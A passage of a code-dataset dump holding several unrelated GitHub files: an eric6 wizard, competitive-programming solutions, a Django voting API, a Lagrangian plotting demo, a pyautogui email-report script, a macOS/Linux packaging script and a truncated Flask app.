'self.tr(\"{0}\"),{1}{2}'.format(\n self.eCaption.text(), os.linesep, istring)\n if self.rSaveFileUrl.isChecked():\n if not self.eStartWith.text():\n code += 'QUrl(),{0}{1}'.format(os.linesep, istring)\n else:\n if self.cStartWith.isChecked():\n fmt = '{0},{1}{2}'\n else:\n fmt = 'QUrl(\"{0}\"),{1}{2}'\n code += fmt.format(self.eStartWith.text(), os.linesep,\n istring)\n else:\n if not self.eStartWith.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n if self.cStartWith.isChecked():\n fmt = '{0},{1}{2}'\n else:\n fmt = '\"{0}\",{1}{2}'\n code += fmt.format(self.eStartWith.text(), os.linesep,\n istring)\n if not self.eFilters.text():\n code += '\"\"'\n else:\n if self.cFilters.isChecked():\n fmt = '{0}'\n else:\n fmt = 'self.tr(\"{0}\")'\n code += fmt.format(self.eFilters.text())\n if self.rfSaveFile.isChecked() or self.__dialogVariant in (5, 6):\n if self.eInitialFilter.text() == \"\":\n initialFilter = \"None\"\n else:\n if self.cInitialFilter.isChecked():\n fmt = '{0}'\n else:\n fmt = 'self.tr(\"{0}\")'\n initialFilter = fmt.format(self.eInitialFilter.text())\n code += ',{0}{1}{2}'.format(os.linesep, istring, initialFilter)\n if (\n (not self.cSymlinks.isChecked()) or\n (not self.cConfirmOverwrite.isChecked())\n ):\n code += ',{0}{1}{2}.Options('.format(\n os.linesep, istring, dialogType)\n if not self.cSymlinks.isChecked():\n code += '{0}{1}.DontResolveSymlinks'.format(\n dialogType, optionStr)\n if (\n (not self.cSymlinks.isChecked()) and\n (not self.cConfirmOverwrite.isChecked())\n ):\n code += ' | '\n if not self.cConfirmOverwrite.isChecked():\n code += '{0}{1}.DontConfirmOverwrite'.format(\n dialogType, optionStr)\n code += ')'\n if (\n self.rSaveFileUrl.isChecked() and\n bool(self.schemesEdit.text())\n ):\n 
code += ',{0}{1}{2}'.format(\n os.linesep, istring, self.__prepareSchemesList())\n \n code += '){0}'.format(estring)\n elif self.rDirectory.isChecked() or self.rDirectoryUrl.isChecked():\n if self.rDirectory.isChecked():\n code += 'getExistingDirectory({0}{1}'.format(\n os.linesep, istring)\n else:\n code += 'getExistingDirectoryUrl({0}{1}'.format(\n os.linesep, istring)\n code += '{0},{1}{2}'.format(parent, os.linesep, istring)\n if not self.eCaption.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n code += 'self.tr(\"{0}\"),{1}{2}'.format(\n self.eCaption.text(), os.linesep, istring)\n if self.rDirectoryUrl.isChecked():\n if not self.eWorkDir.text():\n code += 'QUrl()'\n else:\n if self.cWorkDir.isChecked():\n fmt = '{0}'\n else:\n fmt = 'QUrl(\"{0}\")'\n code += fmt.format(self.eWorkDir.text())\n else:\n if not self.eWorkDir.text():\n code += '\"\"'\n else:\n if self.cWorkDir.isChecked():\n fmt = '{0}'\n else:\n fmt = '\"{0}\"'\n code += fmt.format(self.eWorkDir.text())\n code += ',{0}{1}{2}.Options('.format(os.linesep, istring,\n dialogType)\n if not self.cSymlinks.isChecked():\n code += '{0}{1}.DontResolveSymlinks | '.format(\n dialogType, optionStr)\n if self.cDirOnly.isChecked():\n code += '{0}{1}.ShowDirsOnly'.format(\n dialogType, optionStr)\n else:\n code += '{0}.Option(0)'.format(dialogType)\n code += ')'\n if self.rDirectoryUrl.isChecked():\n code += ',{0}{1}{2}'.format(\n os.linesep, istring, self.__prepareSchemesList())\n code += '){0}'.format(estring)\n \n return code\n \n def __prepareSchemesList(self):\n \"\"\"\n Private method to prepare the list of supported schemes.\n \n @return string representation of the supported schemes\n @rtype str\n \"\"\"\n return repr(self.schemesEdit.text().strip().split())\n","repo_name":"sharkblue-LS/PythonProjects","sub_path":"eric6/eric/eric6/Plugins/WizardPlugins/FileDialogWizard/FileDialogWizardDialog.py","file_name":"FileDialogWizardDialog.py","file_ext":"py","file_size_in_byte":29335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"25413676599","text":"# https://atcoder.jp/contests/abc038/tasks/abc038_d\n# \n# \n# wで昇順で並べる.並び替えた列の,hのLONGEST INCREASING SEQUENCEを求める.\n# - wが等しい2要素を除去できず\n# - LISを求める方法\n# で詰まって,以下のページをカンニングしてしまう.\n# https://soohprogramming.wordpress.com/2020/11/13/abc038-d-%E3%83%97%E3%83%AC%E3%82%BC%E3%83%B3%E3%83%88/\n# \n# 前者は,wの後にhを降順に並べると,同一のwから選択される要素は一つにできる.\n# 後者は,蟻本のP.64を見ました.蟻本一版のdp[j] は,dp[j+1]の誤植?\n\nN = int(input())\nWH = []\nfor _ in range(N):\n w,h = map(int, input().split())\n WH.append((w,h))\n\nWH.sort(key=lambda ele: (ele[0], -ele[1]))\n\nHs = [ele[1] for ele in WH]\n\n# print(WHs)\n\ndef LIS(arr):\n dp = [0] * (len(arr)+1)\n for index,a in enumerate(arr):\n dp[index+1] = 1\n # print(\"index, a\", index, a, dp)\n for j in range(index):\n # print(index, j, dp, arr[j], a)\n if arr[j] < a:\n dp[index+1] = max(dp[index+1], dp[j+1]+1)\n return dp\n\nprint(LIS(Hs)[-1])","repo_name":"mamemilk/acrc","sub_path":"プログラミングコンテストチャレンジブック_秋葉,他/src/2-2-2_04_abc038_d__WA__.py","file_name":"2-2-2_04_abc038_d__WA__.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40921246664","text":"from rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework import permissions\n\nimport json\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import 
User\nfrom .permissions import ReadOnly\n\nfrom .models import Pizza, Vote, ToppingsInPizza, Topping\n\n\n@api_view(['GET'])\n@permission_classes((ReadOnly,))\ndef get_res_of_voting(request):\n res_of_voting = {}\n for pizza in Pizza.objects.all():\n res_of_voting[pizza.name] = 0\n for vote in Vote.objects.all():\n res_of_voting[vote.pizza.name] += 1\n return HttpResponse(json.dumps(res_of_voting))\n\n\n@api_view(['POST'])\n@permission_classes((permissions.IsAuthenticated,))\ndef post_vote(request):\n try:\n id_pizza = int(request.data['id_pizza'])\n except:\n return HttpResponse(json.dumps({'status': 'Incorrect data type'}))\n if Pizza.objects.filter(pk=id_pizza).exists() and Vote.objects.filter(author_id=request.user.id).exists():\n Vote(pizza_id=id_pizza, author_id=request.user.id).save()\n if Pizza.filter(pk=id_pizza):\n Vote(author=request.user, pizza_id=id_pizza).save()\n return HttpResponse(json.dumps({'status': 'Correct data types'}))\n\n\n@api_view(['GET'])\ndef amount_of_toppings(request):\n amount_top = {}\n for pizza in Pizza.objects.all():\n amount_top[pizza.name] = 0\n for topping in ToppingsInPizza.objects.all():\n amount_top[topping.pizza.name] += 1\n return HttpResponse(json.dumps(amount_top))\n\n\n@api_view(['POST'])\ndef add_toppings_in_pizza(request):\n try:\n id_pizza = int(request.data['id_pizza'])\n id_topping = int(request.data['id_topping'])\n except:\n return HttpResponse(json.dumps({'status': 'Incorrect data type'}))\n\n if Pizza.objects.filter(pk=id_pizza) and Topping.objects.filter(pk=id_topping):\n if Pizza.objects.get(id=id_pizza).author.id.__eq__(request.user.id):\n ToppingsInPizza(pizza_id=id_pizza, topping_id=id_topping).save()\n return HttpResponse(json.dumps({'status': 'Save if not existed'}))\n return HttpResponse(json.dumps({'status': 'Not existed pizza or topping id or not pizza author'}))\n\n\n@api_view(['POST'])\ndef add_pizza(request):\n try:\n pizza_name = str(request.data['pizza_name'])\n pizza_price = int(request.data['pizza_price'])\n except:\n return HttpResponse(json.dumps({'status': 'Incorrect data type'}))\n Pizza(name=pizza_name, price=pizza_price, author=request.user).save()\n return HttpResponse(json.dumps({'status': 'Correct data type'}))\n","repo_name":"amsuredev/pizza","sub_path":"api/views_functions.py","file_name":"views_functions.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14592107699","text":"import itertools\n\nimport day09.data as data\n\n\ndef part1():\n value = data.INPUT\n\n for idx in range(25, len(value)):\n pre_25 = value[idx - 25 : idx]\n sums = [sum(pair) for pair in itertools.permutations(pre_25, 2)]\n\n current = value[idx]\n\n if current not in sums:\n return current\n\n return 0\n\n\ndef part2():\n value = data.INPUT\n\n target = 29221323\n for start_idx in range(len(value)):\n for item_count in range(2, len(value) - start_idx):\n items = []\n for idx in range(item_count):\n items.append(value[start_idx + idx])\n\n total = sum(items)\n if total == target:\n return min(items) + max(items)\n\n if total > target:\n break\n\n return 0\n","repo_name":"ogun/advent-of-code-2020","sub_path":"day09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"16614194155","text":"import importlib\nimport inspect\nimport types\n\n\ndef import_from_python(interpeter, stack, scopes, stream):\n val = 
stack.pop()\n mod = importlib.import_module(val.VAL)\n tok = interpeter.Token(TYPE=\"py-obj\", VAL=mod)\n stack.append(tok)\n\n\ndef py_call(interpeter, stack, scopes, stream):\n val2, val = stack.pop(), stack.pop()\n\n if not val.TYPE == \"py-obj\":\n interpeter.report_error(\n \"TYPE\",\n \"py_call\",\n \"%s is not a py-obj!\" % val)\n if not isinstance(val.VAL, types.FunctionType):\n interpeter.report_error(\n \"TYPE\",\n \"py_call\",\n \"%s.VAL is not a Python function!\")\n\n f = val.VAL\n\n spec = inspect.getargspec(f)\n\n defaults = zip(reversed(spec.args), reversed(spec.defaults))\n kwargs = dict(defaults)\n\n args = []\n for arg in val2.VAL:\n args.append(arg)\n\n # print(\"KW-ARGS:\", kwargs)\n # print(\"ARGS:\", args)\n # print(\"FUNC:\", f)\n\n res = f(*args, **kwargs)\n\n # print(\"RES:\", repr(res))\n\n tok = interpeter.Token(TYPE=\"py-obj\", VAL=res)\n stack.append(tok)\n\n\nmodule = {\n \"import_from_python\": import_from_python,\n \"py_call\": py_call\n}\n","repo_name":"StackLanguge/stack-language","sub_path":"lib/import_from_python.py","file_name":"import_from_python.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"38770688673","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@Time : 2023/04/01 16:56:04\n@File : settingPage.py\n@Software: VSCode\n@Author : PPPPAN \n@Version : 0.7.66\n@Contact : for_freedom_x64@live.com\n'''\n\nimport sys, os, platform, subprocess, time\n\nif __name__ == '__main__':\n if platform.system() == 'Darwin':\n print('当前系统为:MacOS')\n flag = input('make为程序包app 输入1 ,make为dmg发布 输入2 :\\n')\n if flag == '1':\n print('......开始make程序为app......')\n os.system('rm -rf build/Ashore.MacOS.file')\n os.system('rm -rf dist/Ashore.MacOS.file')\n os.system('pyinstaller bale/Ashore.MacOS.file.spec')\n os.system('cp bale/Info.plist dist/Ashore.app/Contents/')\n os.system('mkdir dist/Ashore.MacOS.file')\n os.system('mkdir dist/Ashore.MacOS.file/Ashore')\n os.system('mv dist/Ashore.app dist/Ashore.MacOS.file/Ashore')\n os.system('mv dist/Ashore dist/Ashore.MacOS.file/Ashore')\n print('Ashore.app 打包完毕')\n cmd = 'open dist/Ashore.MacOS.file/Ashore/Ashore.app --reveal'\n subprocess.Popen([cmd],shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n elif flag == '2':\n print('......开始make程序为dmg......')\n os.system('rm -rf build/Ashore.MacOS.dmg')\n os.system('rm -rf dist/Ashore.MacOS.dmg')\n os.system('defaults write com.apple.finder AppleShowAllFiles YES')\n os.system('killall Finder')\n os.system('pyinstaller bale/Ashore.MacOS.file.spec')\n os.system('cp bale/Info.plist dist/Ashore.app/Contents/')\n os.system('mkdir dist/Ashore.MacOS.dmg')\n os.system('mkdir dist/Ashore.MacOS.dmg/temp')\n os.system('mv dist/Ashore.app dist/Ashore.MacOS.dmg/temp')\n os.system('cp static/icon/icon.funtion/icon.icns dist/Ashore.MacOS.dmg')\n os.system('cp bale/dmg.png dist/Ashore.MacOS.dmg/temp/.background.png')\n os.system('rm dist/Ashore')\n os.chdir('dist/Ashore.MacOS.dmg') \n os.system('ln -s /Applications temp')\n #使用temp文件夹制作dmg文件\n os.system('hdiutil create -srcfolder \"temp\" -size 50M -format UDRW -volname \"Ashore Installer\" \"temp/Ashore.temp.dmg\"')\n print('Created DMG: Ashore.temp.dmg')\n time.sleep(1)\n os.system('hdiutil attach \"temp/Ashore.temp.dmg\"')\n time.sleep(1)\n # 使用applescript设置一系列的窗口属性\n applescript = '''\n echo '\n tell application \"Finder\"\n tell disk \"Ashore Installer\"\n open\n set current view of container 
window to icon view\n set toolbar visible of container window to false\n set statusbar visible of container window to false\n set the bounds of container window to {300, 200, 1000, 660}\n set viewOptions to the icon view options of container window\n set arrangement of viewOptions to not arranged\n set icon size of viewOptions to 128\n set background picture of viewOptions to file \".background.png\"\n set position of item \"Ashore.app\" of container window to {130, 120}\n set position of item \"Applications\" of container window to {390, 120}\n set position of item \".background.png\" of container window to {0, 0}\n close\n open\n update without registering applications\n delay 2\n end tell\n end tell\n ' | osascript\n '''\n os.system(applescript)\n time.sleep(2)\n os.system('sync')\n # 设置映像图标\n os.system('cp icon.icns \"/Volumes/Ashore Installer/.VolumeIcon.icns\"')\n os.system('SetFile -c icnC \"/Volumes/Ashore Installer/.VolumeIcon.icns\"')\n os.system('SetFile -a C \"/Volumes/Ashore Installer\"')\n # 卸载\n time.sleep(5)\n os.system('hdiutil detach \"/Volumes/Ashore Installer\"')\n time.sleep(5)\n # 压缩映像并设置为只读\n print('Creating compressed image')\n os.system('hdiutil convert \"temp/Ashore.temp.dmg\" -format UDZO -imagekey zlib-level=9 -o \"Ashore.dmg\"')\n # 清除临时文件\n os.system('rm -r temp')\n os.system('rm icon.icns')\n os.system('defaults write com.apple.finder AppleShowAllFiles NO')\n os.system('killall Finder')\n print('Ashore.dmg 打包完毕')\n os.system('open Ashore.dmg --reveal')\n else:\n print('error')\n elif platform.system() == 'Linux':\n print('当前系统为:Linux')\n flag = input('make为单文件 输入1 ,make为文件夹 输入2 :\\n')\n if flag == '1':\n print('......开始make为 单文件 程序......')\n os.system('rm -rf build/Ashore.Linux.file')\n os.system('rm -rf dist/Ashore.Linux.file')\n os.system('pyinstaller bale/Ashore.Linux.file.spec')\n os.system('mkdir dist/Ashore.Linux.file')\n os.system('mkdir dist/Ashore.Linux.file/Ashore')\n os.system('mv dist/Ashore dist/Ashore.Linux.file/Ashore')\n os.system('cp static/icon/icon.funtion/icon0.png dist/Ashore.Linux.file/Ashore/icon.png')\n os.system('cp bale/ashore.desktop dist/Ashore.Linux.file/Ashore')\n os.system('cp bale/make.Ashore.Linux.file.sh dist/Ashore.Linux.file/Ashore/make.sh')\n print('单文件 Ashore 打包完毕')\n cmd = 'nautilus dist/Ashore.Linux.file/Ashore/Ashore --select'\n subprocess.Popen([cmd],shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n elif flag == '2':\n print('......开始make为 文件夹 程序......')\n os.system('rm -rf build/Ashore.Linux.folder')\n os.system('rm -rf dist/Ashore.Linux.folder')\n os.system('pyinstaller bale/Ashore.Linux.folder.spec')\n os.system('mkdir dist/Ashore.Linux.folder')\n os.system('mv -f dist/Ashore dist/Ashore.Linux.folder')\n os.system('cp static/icon/icon.funtion/icon0.png dist/Ashore.Linux.folder/Ashore/icon.png')\n os.system('cp bale/ashore.desktop dist/Ashore.Linux.folder')\n os.system('cp bale/make.Ashore.Linux.folder.sh dist/Ashore.Linux.folder/make.sh')\n print('文件夹 Ashore 打包完毕')\n cmd = 'nautilus dist/Ashore.Linux.folder/Ashore/Ashore --select'\n subprocess.Popen([cmd],shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n else:\n print('error')\n elif platform.system() == 'Windows':\n print('当前系统为:Windows')","repo_name":"PanZK/Ashore","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":7158,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"5264739918","text":"from typing import 
List, Tuple, Dict, Any, Callable, Optional, Iterable\nfrom logging import Logger, getLogger\nfrom enum import Enum\n\nfrom numpy import ndarray, linspace, power, ones, zeros, zeros_like\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\nfrom matplotlib.figure import Figure\nfrom matplotlib.axes import Axes\nfrom matplotlib.widgets import Slider, Button\nfrom matplotlib.lines import Line2D\nfrom freq_used.logging_utils import set_logging_basic_config\nfrom freq_used.plotting import get_figure\n\nfrom optmlstat.functions.function_base import FunctionBase\nfrom optmlstat.functions.basic_functions.affine_function import AffineFunction\nfrom optmlstat.functions.basic_functions.quadratic_function import QuadraticFunction\n\n\nlogger: Logger = getLogger()\nmpl.use(\"TkAgg\")\n\n\nLAGRANGE_MULTIPLIER_SLIDER_WIDTH: float = 0.2\nLAGRANGE_MULTIPLIER_SLIDER_HEIGHT: float = 0.03\nLAGRANGE_MULTIPLIER_CENTER_POSITION: float = 0.3\nLAGRANGE_MULTIPLIER_SLIDER_BOTTOM_POSITION: float = 0.90\nLAGRANGE_MULTIPLIER_SLIDER_COLOR: str = \"lightgoldenrodyellow\"\n\nRESET_BUTTON_WIDTH: float = 0.1\nRESET_BUTTON_HEIGHT: float = 0.03\nRESET_BUTTON_CENTER_POSITION: float = 0.6\nRESET_BUTTON_BOTTOM_POSITION: float = 0.90\n\n\nclass ButtonSliderBase:\n \"\"\"\n Base class for Button or Slider class.\n \"\"\"\n\n def __init__(\n self, figure: Figure, width: float, height: float, center_position: float, bottom_position: float\n ) -> None:\n self.figure: Figure = figure\n self.width: float = width\n self.height: float = height\n self.center_position: float = center_position\n self.bottom_position: float = bottom_position\n\n self.axis: Axes = figure.add_axes(\n [self.center_position - self.width / 2.0, self.bottom_position, self.width, self.height]\n )\n\n\nclass MySlider(ButtonSliderBase):\n \"\"\"\n Wrapper class for matplotlib.widgets.Slider.\n \"\"\"\n\n def __init__(\n self,\n figure: Figure,\n width: float,\n height: float,\n center_position: float,\n bottom_position: float,\n slider_kwargs: Dict[str, Any],\n ) -> None:\n super(MySlider, self).__init__(figure, width, height, center_position, bottom_position)\n\n self.slider: Slider = Slider(ax=self.axis, **slider_kwargs)\n\n\nclass MyButton(ButtonSliderBase):\n \"\"\"\n Wrapper class for matplotlib.widgets.Slider.\n \"\"\"\n\n def __init__(\n self,\n figure: Figure,\n width: float,\n height: float,\n center_position: float,\n bottom_position: float,\n button_kwargs: Dict[str, Any],\n ) -> None:\n super(MyButton, self).__init__(figure, width, height, center_position, bottom_position)\n\n self.button: Button = Button(ax=self.axis, **button_kwargs)\n\n\nclass LagrangianIllustrator:\n \"\"\"\n This class shows graphically how Lagrange multipliers work\n to help clients obtain geometrical understanding of their role in constrained optimization.\n\n Consider the following (one-dimensional) equality constrained optimization problem:\n\n minimize f(x)\n subject to h(x) >= 0 or h(x) = 0 or h(x) <= 0\n\n where f: R -> R and h: R -> R are the objective function and constraint function respectively.\n Depending on the type of constraint, the interpretation of the Lagrange multiplier changes.\n\n The Lagrangian is defined by\n\n L(x, lambda) = f(x) + lambda h(x)\n\n The Lagrange dual function is defined by\n\n g(lambda) = inf_x L(x, lambda)\n\n If the constraint in the above problem is \">=\", then lambda <=0,\n and if the constraint is \"<=\", then lambda >= 0,\n and if the constraint is \"=\", then lambda can take any real values.\n \"\"\"\n\n NUM_PLOTTING_POINTS: 
int = 100\n ALPHA: float = 0.5\n\n def __init__(\n self,\n obj_fcn: FunctionBase,\n const_fcn: FunctionBase,\n cnst_boundary_points: Iterable[float],\n minimum_point_fcn: Optional[Callable] = None,\n minimum_value_fcn: Optional[Callable] = None,\n ) -> None:\n self.obj_fcn: FunctionBase = obj_fcn\n self.const_fcn: FunctionBase = const_fcn\n self.cnst_boundary_points: List[float] = list(cnst_boundary_points)\n\n self.minimum_point_fcn: Callable = lambda x: 0.0\n if minimum_point_fcn is not None:\n self.minimum_point_fcn = minimum_point_fcn\n\n self.minimum_value_fcn: Callable = lambda x: 0.0\n if minimum_value_fcn is not None:\n self.minimum_value_fcn = minimum_value_fcn\n\n def create_interactive_plot(\n self, x_min: float, x_max: float, lambda_min: float, lambda_max: float, initial_lambda: float\n ) -> Figure:\n\n x_array_1d: ndarray = linspace(x_min, x_max, LagrangianIllustrator.NUM_PLOTTING_POINTS)\n obj_fcn_array_1d: ndarray = self.obj_fcn.get_y_values_2d_from_x_values_1d(x_array_1d).ravel()\n cnst_fcn_array_1d: ndarray = self.const_fcn.get_y_values_2d_from_x_values_1d(x_array_1d).ravel()\n\n figure: Figure = get_figure(\n 1, 1, axis_width=4, axis_height=3, left_margin=0.5, right_margin=3.0, bottom_margin=0.5\n )\n axis: Axes = figure.get_axes()[0]\n\n axis.plot(x_array_1d, obj_fcn_array_1d, \"k-\", label=\"objective function\", alpha=LagrangianIllustrator.ALPHA)\n axis.plot(\n x_array_1d, cnst_fcn_array_1d, \"b-\", label=\"equality constraint function\", alpha=LagrangianIllustrator.ALPHA\n )\n ylim: Tuple[float] = axis.get_ylim()\n for cnst_boundary_point in self.cnst_boundary_points:\n axis.plot(\n ones(2) * cnst_boundary_point,\n ylim,\n \"b-.\",\n label=\"constraint boundary\",\n alpha=LagrangianIllustrator.ALPHA,\n )\n\n lagrangian_line_2d_list: List[Line2D] = axis.plot(x_array_1d, zeros_like(x_array_1d), \"r-\", label=\"Lagrangian\")\n lagrangian_minimum_x_list_2d_list = axis.plot(zeros(2), ylim, \"r-.\", label=\"Lagrangian minimum x\")\n lagrangian_minimum_y_line_2d_list: List[Line2D] = axis.plot(\n [x_min, x_max], zeros(2), \"r-.\", label=\"Lagrangian minimum y\"\n )\n\n obj_minimum_point_line_2d_list: List[Line2D] = axis.plot([0.0], [0.0], \"o\", markersize=8)\n lagrangian_minimum_point_line_2d_list: List[Line2D] = axis.plot(\n [0.0], [0.0], \"o\", markersize=8, markerfacecolor=\"r\", markeredgecolor=\"none\"\n )\n\n axis.legend(bbox_to_anchor=(1.05, 0.9))\n\n assert len(lagrangian_line_2d_list) == 1\n assert len(lagrangian_minimum_y_line_2d_list) == 1\n assert len(lagrangian_minimum_x_list_2d_list) == 1\n assert len(obj_minimum_point_line_2d_list) == 1\n assert len(lagrangian_minimum_point_line_2d_list) == 1\n\n lagrangian_line_2d: Line2D = lagrangian_line_2d_list[0]\n lagrangian_minimum_x_list_2d: Line2D = lagrangian_minimum_x_list_2d_list[0]\n lagrangian_minimum_y_line_2d: Line2D = lagrangian_minimum_y_line_2d_list[0]\n lagrangian_minimum_point_line_2d: Line2D = lagrangian_minimum_point_line_2d_list[0]\n\n obj_minimum_point_line_2d: Line2D = obj_minimum_point_line_2d_list[0]\n\n def update_lagrangian_in_x(value: float):\n lagrangian_minimum_x: float = self.minimum_point_fcn(value)\n lagrangian_minimum_y: float = self.minimum_value_fcn(value)\n\n lagrangian_line_2d.set_ydata(obj_fcn_array_1d + value * cnst_fcn_array_1d)\n lagrangian_minimum_x_list_2d.set_xdata(ones(2) * lagrangian_minimum_x)\n lagrangian_minimum_y_line_2d.set_ydata(lagrangian_minimum_y * ones(2))\n lagrangian_minimum_point_line_2d.set_xdata(ones(1) * lagrangian_minimum_x)\n 
lagrangian_minimum_point_line_2d.set_ydata(ones(1) * lagrangian_minimum_y)\n\n obj_minimum_point_line_2d.set_xdata(ones(1) * lagrangian_minimum_x)\n obj_minimum_point_line_2d.set_ydata(\n ones(1) * obj_fcn.get_y_values_2d_from_x_values_1d(ones(1) * lagrangian_minimum_x).ravel()\n )\n if self.const_fcn.get_y_values_2d_from_x_values_1d(ones(1) * lagrangian_minimum_x)[0, 0] <= 0.0:\n obj_minimum_point_line_2d.set_color(\"b\")\n else:\n obj_minimum_point_line_2d.set_color(\"r\")\n\n figure.canvas.draw_idle()\n\n lagrange_multiplier_slider: MySlider = MySlider(\n figure,\n LAGRANGE_MULTIPLIER_SLIDER_WIDTH,\n LAGRANGE_MULTIPLIER_SLIDER_HEIGHT,\n LAGRANGE_MULTIPLIER_CENTER_POSITION,\n LAGRANGE_MULTIPLIER_SLIDER_BOTTOM_POSITION,\n dict(label=\"Lagrange multiplier\", valmin=lambda_min, valmax=lambda_max, valinit=initial_lambda),\n )\n lagrange_multiplier_slider.slider.on_changed(update_lagrangian_in_x)\n\n def reset(event):\n lagrange_multiplier_slider.slider.reset()\n\n reset_button: MyButton = MyButton(\n figure,\n RESET_BUTTON_WIDTH,\n RESET_BUTTON_HEIGHT,\n RESET_BUTTON_CENTER_POSITION,\n RESET_BUTTON_BOTTOM_POSITION,\n dict(label=\"Reset\"),\n )\n reset_button.button.on_clicked(reset)\n\n update_lagrangian_in_x(initial_lambda)\n\n plt.show()\n\n return figure\n\n\nclass Problem(Enum):\n LCQM: int = 10 # linearly constrained quadratic program\n QCLM: int = 20 # quadratically constrained linear program\n\n\nif __name__ == \"__main__\":\n\n set_logging_basic_config(__file__)\n\n case: Problem\n case_num: int = int(input(\"case? \"))\n if case_num == 1:\n case = Problem.LCQM\n elif case_num == 2:\n case = Problem.QCLM\n else:\n assert False, case_num\n\n obj_fcn: FunctionBase\n cnst_fcn: FunctionBase\n cnst_boundary_points: List[float]\n\n if case == Problem.LCQM:\n \"\"\"\n f(x) = x^2\n h(x) = x - 1\n \"\"\"\n obj_fcn = QuadraticFunction(ones((1, 1, 1)), zeros((1, 1)), zeros(1))\n cnst_fcn = AffineFunction(ones((1, 1)), -ones(1))\n\n cnst_boundary_points = [1.0]\n\n def minimum_of_lagrangian(nu: float) -> float:\n return -power(nu, 2.0) / 4.0 - nu\n\n def minimum_point(nu: float) -> float:\n return -nu / 2.0\n\n elif case == Problem.QCLM:\n \"\"\"\n f(x) = x\n h(x) = x^2 - 1\n\n L(x, lambda) = x + lambda (x^2 - 1)\n d L(x, lambda) / dx = 1 + 2 lambda x\n\n g(lambda) = - 1 / 2lambda + lambda(1/4lambda^2 - 1) = - 1 / 4lambda - lambda\n \"\"\"\n obj_fcn = AffineFunction(ones((1, 1)), zeros(1))\n cnst_fcn = QuadraticFunction(ones((1, 1, 1)), zeros((1, 1)), -ones(1))\n\n cnst_boundary_points = [-1.0, 1.0]\n\n def minimum_of_lagrangian(nu: float) -> float:\n return -nu - 1.0 / (4 * abs(nu) + 1e-6) * (1.0 if nu >= 0.0 else -1.0)\n\n def minimum_point(nu: float) -> float:\n return -1.0 / (2.0 * abs(nu) + 1e-6) * (1.0 if nu >= 0.0 else -1.0)\n\n else:\n assert False, case\n\n lambda_min: float = -8.0\n lambda_max: float = 8.0\n initial_lambda: float = 0.0\n\n x_min: float = -3.0\n x_max: float = 3.0\n\n lagrangian_illustrator: LagrangianIllustrator = LagrangianIllustrator(\n obj_fcn, cnst_fcn, cnst_boundary_points, minimum_point, minimum_of_lagrangian\n )\n lagrangian_illustrator.create_interactive_plot(x_min, x_max, lambda_min, lambda_max, initial_lambda)\n","repo_name":"sungheeyun/optmlstat","sub_path":"bin/lagrangian_interpretation_demo_1d.py","file_name":"lagrangian_interpretation_demo_1d.py","file_ext":"py","file_size_in_byte":11391,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"4665456340","text":"import pyautogui\nimport 
pyperclip\nimport time\nimport pandas\n\npyautogui.PAUSE = 0.5\n\npyautogui.click(x=958, y=1054)\npyautogui.hotkey(\"ctrl\", \"t\")\npyautogui.write(\"https://drive.google.com/drive/folders/1YlfO_VVBlaM4MYPnHUSbOG3JHGJ81CDp?usp=sharing\")\npyautogui.press(\"enter\")\n\ntime.sleep(5)\n\npyautogui.click(x=501, y=283)\npyautogui.click(x=603, y=702)\n\ntime.sleep(5)\n\ntabela = pandas.read_csv(r\"/home/david/Downloads/compras.csv\", sep=\";\")\ntotal = tabela[\"ValorFinal\"].sum()\nquantidade = tabela[\"Quantidade\"].sum()\npreco_medio = total / quantidade\n\npyautogui.hotkey(\"ctrl\", \"t\")\npyautogui.write(\"https://mail.google.com/mail/u/0/#inbox\")\npyautogui.press(\"enter\")\n\ntime.sleep(5)\n\npyautogui.click(x=70, y=174)\npyautogui.write('davidspader97@gmail.com')\npyautogui.press('tab', presses=2)\npyperclip.copy('Relatório de vendas')\npyautogui.hotkey(\"ctrl\", \"v\")\npyautogui.press('tab')\ntext = f\"\"\"\nRelatório de vendas:\n\nTotal gasto: R$ {total:,.2f}\nQuantidade: {quantidade:,}\nPreço médio: R$ {preco_medio:,.2f}\n\n\"\"\"\npyperclip.copy(text)\npyautogui.hotkey(\"ctrl\", \"v\")\npyautogui.hotkey(\"ctrl\", \"enter\")","repo_name":"davidspader/python-automation","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2520988253","text":"from flask import Flask, render_template, request, flash\r\nimport os\r\n\r\n#Flask setup\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = '46d1ce3b317f4d2ce1d08512694d27b6'\r\n\r\n\r\n#Home Page of Web App\r\n@app.route(\"/\", methods=[\"POST\",\"GET\"])\r\n@app.route(\"/home\", methods=[\"POST\",\"GET\"])\r\ndef home():\r\n return render_template('home.html')\r\n\r\n\r\n#route for manually entering sequences\r\n@app.route(\"/enter_sequence\", methods=[\"POST\",\"GET\"])\r\ndef enter_sequence():\r\n flash(\"Please enter sequence:\")\r\n return 